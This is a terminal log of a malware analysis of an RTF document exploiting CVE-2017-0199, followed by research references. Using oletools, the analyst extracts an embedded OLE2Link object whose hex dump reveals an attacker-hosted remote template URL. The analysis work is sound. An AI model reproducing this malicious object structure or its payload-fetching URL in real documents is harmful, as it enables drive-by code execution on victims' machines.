root@sh:~/cve-2017-0199# file ae48d23e39bf4619881b5c4dd2712b8fabd4f8bd6beb0ae167647995ba68100e.bin
ae48d23e39bf4619881b5c4dd2712b8fabd4f8bd6beb0ae167647995ba68100e.bin: Rich Text Format data, version 1, unknown character set
root@sh:~/cve-2017-0199# xxd ae48d23e39bf4619881b5c4dd2712b8fabd4f8bd6beb0ae167647995ba68100e.bin | head -3
00000000: 7b5c 7274 6631 5c61 6465 666c 616e 6731 {\rtf1\adeflang1
00000010: 3032 355c 616e 7369 5c61 6e73 6963 7067 025\ansi\ansicpg
00000020: 3132 3532 5c75 6331 5c61 6465 6666 305c 1252\uc1\adeff0\
root@sh:~/cve-2017-0199# rtfobj ae48d23e39bf4619881b5c4dd2712b8fabd4f8bd6beb0ae167647995ba68100e.bin
rtfobj 0.50 - http://decalage.info/python/oletools
THIS IS WORK IN PROGRESS - Check updates regularly!
Please report any issue at https://github.com/decalage2/oletools/issues
===============================================================================
File: 'ae48d23e39bf4619881b5c4dd2712b8fabd4f8bd6beb0ae167647995ba68100e.bin' - size: 37519 bytes
---+----------+-------------------------------+-------------------------------
id |index |OLE Object |OLE Package
---+----------+-------------------------------+-------------------------------
0 |00003181h |format_id: 2 |Not an OLE Package
| |class name: 'OLE2Link' |
| |data size: 2560 |
---+----------+-------------------------------+-------------------------------
root@sh:~/cve-2017-0199# rtfobj -s 0 ae48d23e39bf4619881b5c4dd2712b8fabd4f8bd6beb0ae167647995ba68100e.bin
rtfobj 0.50 - http://decalage.info/python/oletools
THIS IS WORK IN PROGRESS - Check updates regularly!
Please report any issue at https://github.com/decalage2/oletools/issues
===============================================================================
File: 'ae48d23e39bf4619881b5c4dd2712b8fabd4f8bd6beb0ae167647995ba68100e.bin' - size: 37519 bytes
---+----------+-------------------------------+-------------------------------
id |index |OLE Object |OLE Package
---+----------+-------------------------------+-------------------------------
0 |00003181h |format_id: 2 |Not an OLE Package
| |class name: 'OLE2Link' |
| |data size: 2560 |
---+----------+-------------------------------+-------------------------------
Saving file embedded in OLE object #0:
format_id = 2
class name = 'OLE2Link'
data size = 2560
saving to file ae48d23e39bf4619881b5c4dd2712b8fabd4f8bd6beb0ae167647995ba68100e.bin_object_00003181.bin
root@sh:~/cve-2017-0199# xxd ae48d23e39bf4619881b5c4dd2712b8fabd4f8bd6beb0ae167647995ba68100e.bin_object_00003181.bin
00000000: d0cf 11e0 a1b1 1ae1 0000 0000 0000 0000 ................
00000010: 0000 0000 0000 0000 3e00 0300 feff 0900 ........>.......
00000020: 0600 0000 0000 0000 0000 0000 0100 0000 ................
00000030: 0100 0000 0000 0000 0010 0000 0200 0000 ................
00000040: 0100 0000 feff ffff 0000 0000 0000 0000 ................
00000050: ffff ffff ffff ffff ffff ffff ffff ffff ................
00000060: ffff ffff ffff ffff ffff ffff ffff ffff ................
00000070: ffff ffff ffff ffff ffff ffff ffff ffff ................
00000080: ffff ffff ffff ffff ffff ffff ffff ffff ................
00000090: ffff ffff ffff ffff ffff ffff ffff ffff ................
000000a0: ffff ffff ffff ffff ffff ffff ffff ffff ................
000000b0: ffff ffff ffff ffff ffff ffff ffff ffff ................
000000c0: ffff ffff ffff ffff ffff ffff ffff ffff ................
000000d0: ffff ffff ffff ffff ffff ffff ffff ffff ................
000000e0: ffff ffff ffff ffff ffff ffff ffff ffff ................
000000f0: ffff ffff ffff ffff ffff ffff ffff ffff ................
00000100: ffff ffff ffff ffff ffff ffff ffff ffff ................
00000110: ffff ffff ffff ffff ffff ffff ffff ffff ................
00000120: ffff ffff ffff ffff ffff ffff ffff ffff ................
00000130: ffff ffff ffff ffff ffff ffff ffff ffff ................
00000140: ffff ffff ffff ffff ffff ffff ffff ffff ................
00000150: ffff ffff ffff ffff ffff ffff ffff ffff ................
00000160: ffff ffff ffff ffff ffff ffff ffff ffff ................
00000170: ffff ffff ffff ffff ffff ffff ffff ffff ................
00000180: ffff ffff ffff ffff ffff ffff ffff ffff ................
00000190: ffff ffff ffff ffff ffff ffff ffff ffff ................
000001a0: ffff ffff ffff ffff ffff ffff ffff ffff ................
000001b0: ffff ffff ffff ffff ffff ffff ffff ffff ................
000001c0: ffff ffff ffff ffff ffff ffff ffff ffff ................
000001d0: ffff ffff ffff ffff ffff ffff ffff ffff ................
000001e0: ffff ffff ffff ffff ffff ffff ffff ffff ................
000001f0: ffff ffff ffff ffff ffff ffff ffff ffff ................
00000200: fdff ffff feff ffff feff ffff feff ffff ................
00000210: ffff ffff ffff ffff ffff ffff ffff ffff ................
00000220: ffff ffff ffff ffff ffff ffff ffff ffff ................
00000230: ffff ffff ffff ffff ffff ffff ffff ffff ................
00000240: ffff ffff ffff ffff ffff ffff ffff ffff ................
00000250: ffff ffff ffff ffff ffff ffff ffff ffff ................
00000260: ffff ffff ffff ffff ffff ffff ffff ffff ................
00000270: ffff ffff ffff ffff ffff ffff ffff ffff ................
00000280: ffff ffff ffff ffff ffff ffff ffff ffff ................
00000290: ffff ffff ffff ffff ffff ffff ffff ffff ................
000002a0: ffff ffff ffff ffff ffff ffff ffff ffff ................
000002b0: ffff ffff ffff ffff ffff ffff ffff ffff ................
000002c0: ffff ffff ffff ffff ffff ffff ffff ffff ................
000002d0: ffff ffff ffff ffff ffff ffff ffff ffff ................
000002e0: ffff ffff ffff ffff ffff ffff ffff ffff ................
000002f0: ffff ffff ffff ffff ffff ffff ffff ffff ................
00000300: ffff ffff ffff ffff ffff ffff ffff ffff ................
00000310: ffff ffff ffff ffff ffff ffff ffff ffff ................
00000320: ffff ffff ffff ffff ffff ffff ffff ffff ................
00000330: ffff ffff ffff ffff ffff ffff ffff ffff ................
00000340: ffff ffff ffff ffff ffff ffff ffff ffff ................
00000350: ffff ffff ffff ffff ffff ffff ffff ffff ................
00000360: ffff ffff ffff ffff ffff ffff ffff ffff ................
00000370: ffff ffff ffff ffff ffff ffff ffff ffff ................
00000380: ffff ffff ffff ffff ffff ffff ffff ffff ................
00000390: ffff ffff ffff ffff ffff ffff ffff ffff ................
000003a0: ffff ffff ffff ffff ffff ffff ffff ffff ................
000003b0: ffff ffff ffff ffff ffff ffff ffff ffff ................
000003c0: ffff ffff ffff ffff ffff ffff ffff ffff ................
000003d0: ffff ffff ffff ffff ffff ffff ffff ffff ................
000003e0: ffff ffff ffff ffff ffff ffff ffff ffff ................
000003f0: ffff ffff ffff ffff ffff ffff ffff ffff ................
00000400: 5200 6f00 6f00 7400 2000 4500 6e00 7400 R.o.o.t. .E.n.t.
00000410: 7200 7900 0000 0000 0000 0000 0000 0000 r.y.............
00000420: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000430: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000440: 1600 0500 ffff ffff ffff ffff 0100 0000 ................
00000450: 0003 0000 0000 0000 c000 0000 0000 0046 ...............F
00000460: 0000 0000 0000 0000 0000 0000 104e ab9b .............N..
00000470: 4249 d201 0300 0000 0002 0000 0000 0000 BI..............
00000480: 0100 4f00 6c00 6500 0000 0000 0000 0000 ..O.l.e.........
00000490: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000004a0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000004b0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000004c0: 0a00 0201 ffff ffff 0200 0000 ffff ffff ................
000004d0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000004e0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000004f0: 0000 0000 0000 0000 a801 0000 0000 0000 ................
00000500: 0300 4f00 6200 6a00 4900 6e00 6600 6f00 ..O.b.j.I.n.f.o.
00000510: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000520: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000530: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000540: 1200 0200 ffff ffff ffff ffff ffff ffff ................
00000550: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000560: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000570: 0000 0000 0700 0000 0600 0000 0000 0000 ................
00000580: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000590: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000005a0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000005b0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000005c0: 0000 0000 ffff ffff ffff ffff ffff ffff ................
000005d0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000005e0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000005f0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000600: 0100 0000 0200 0000 0300 0000 0400 0000 ................
00000610: 0500 0000 0600 0000 feff ffff feff ffff ................
00000620: ffff ffff ffff ffff ffff ffff ffff ffff ................
00000630: ffff ffff ffff ffff ffff ffff ffff ffff ................
00000640: ffff ffff ffff ffff ffff ffff ffff ffff ................
00000650: ffff ffff ffff ffff ffff ffff ffff ffff ................
00000660: ffff ffff ffff ffff ffff ffff ffff ffff ................
00000670: ffff ffff ffff ffff ffff ffff ffff ffff ................
00000680: ffff ffff ffff ffff ffff ffff ffff ffff ................
00000690: ffff ffff ffff ffff ffff ffff ffff ffff ................
000006a0: ffff ffff ffff ffff ffff ffff ffff ffff ................
000006b0: ffff ffff ffff ffff ffff ffff ffff ffff ................
000006c0: ffff ffff ffff ffff ffff ffff ffff ffff ................
000006d0: ffff ffff ffff ffff ffff ffff ffff ffff ................
000006e0: ffff ffff ffff ffff ffff ffff ffff ffff ................
000006f0: ffff ffff ffff ffff ffff ffff ffff ffff ................
00000700: ffff ffff ffff ffff ffff ffff ffff ffff ................
00000710: ffff ffff ffff ffff ffff ffff ffff ffff ................
00000720: ffff ffff ffff ffff ffff ffff ffff ffff ................
00000730: ffff ffff ffff ffff ffff ffff ffff ffff ................
00000740: ffff ffff ffff ffff ffff ffff ffff ffff ................
00000750: ffff ffff ffff ffff ffff ffff ffff ffff ................
00000760: ffff ffff ffff ffff ffff ffff ffff ffff ................
00000770: ffff ffff ffff ffff ffff ffff ffff ffff ................
00000780: ffff ffff ffff ffff ffff ffff ffff ffff ................
00000790: ffff ffff ffff ffff ffff ffff ffff ffff ................
000007a0: ffff ffff ffff ffff ffff ffff ffff ffff ................
000007b0: ffff ffff ffff ffff ffff ffff ffff ffff ................
000007c0: ffff ffff ffff ffff ffff ffff ffff ffff ................
000007d0: ffff ffff ffff ffff ffff ffff ffff ffff ................
000007e0: ffff ffff ffff ffff ffff ffff ffff ffff ................
000007f0: ffff ffff ffff ffff ffff ffff ffff ffff ................
00000800: 0100 0002 0900 0000 0100 0000 0000 0000 ................
00000810: 0000 0000 0000 0000 5c01 0000 e0c9 ea79 ........\......y
00000820: f9ba ce11 8c82 00aa 004b a90b 4401 0000 .........K..D...
00000830: 6800 7400 7400 7000 3a00 2f00 2f00 6800 h.t.t.p.:././.h.
00000840: 7900 6f00 6500 7900 6500 6500 7000 2e00 y.o.e.y.e.e.p...
00000850: 7700 7300 2f00 7400 6500 6d00 7000 6c00 w.s./.t.e.m.p.l.
00000860: 6100 7400 6500 2e00 6400 6f00 6300 0000 a.t.e...d.o.c...
00000870: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000880: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000890: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000008a0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000008b0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000008c0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000008d0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000008e0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000008f0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000900: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000910: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000920: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000930: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000940: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000950: 0000 0000 0000 0000 0000 0000 7958 81f4 ............yX..
00000960: 3b1d 7f48 af2c 825d c485 2763 0000 0000 ;..H.,.]..'c....
00000970: a5ab 0000 ffff ffff 2069 3325 f903 cf11 ........ i3%....
00000980: 8fd0 00aa 0068 6f13 0000 0000 ffff ffff .....ho.........
00000990: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000009a0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000009b0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000009c0: 1000 0300 0400 0000 0000 0000 0000 0000 ................
000009d0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000009e0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000009f0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
root@sh:~/cve-2017-0199# strings ae48d23e39bf4619881b5c4dd2712b8fabd4f8bd6beb0ae167647995ba68100e.bin_object_00003181.bin
i3%
root@sh:~/cve-2017-0199# ->> floss -q ae48d23e39bf4619881b5c4dd2712b8fabd4f8bd6beb0ae167647995ba68100e.bin_object_00003181.bin
i3%
Root Entry
ObjInfo
http://hyoeyeep.ws/template.doc
ERROR:floss:FLOSS currently supports the following formats for string decoding and stackstrings: PE
You can analyze shellcode using the -s switch. See the help (-h) for more information.
- https://securingtomorrow.mcafee.com/mcafee-labs/critical-office-zero-day-attacks-detected-wild/
- https://www.fireeye.com/blog/threat-research/2017/04/acknowledgement_ofa.html
- https://www.helpnetsecurity.com/2017/04/10/ms-office-zero-day/
- https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199-hta-handler.html
- https://github.com/nccgroup/Cyber-Defence/blob/master/Technical%20Notes/Office%20zero-day%20(April%202017)/2017-04%20Office%20OLE2Link%20zero-day%20v0.4.pdf
- https://blog.nviso.be/2017/04/12/analysis-of-a-cve-2017-0199-malicious-rtf-document/
- https://www.hybrid-analysis.com/sample/ae48d23e39bf4619881b5c4dd2712b8fabd4f8bd6beb0ae167647995ba68100e?environmentId=100
- https://www.mdsec.co.uk/2017/04/exploiting-cve-2017-0199-hta-handler-vulnerability/
- https://www.microsoft.com/en-us/download/details.aspx?id=7105
- https://www.microsoft.com/en-us/download/details.aspx?id=10725
- rapid7/metasploit-framework#8220
- rapid7/metasploit-framework#8254
- http://justhaifei1.blogspot.jp/2017/07/bypassing-microsofts-cve-2017-0199-patch.html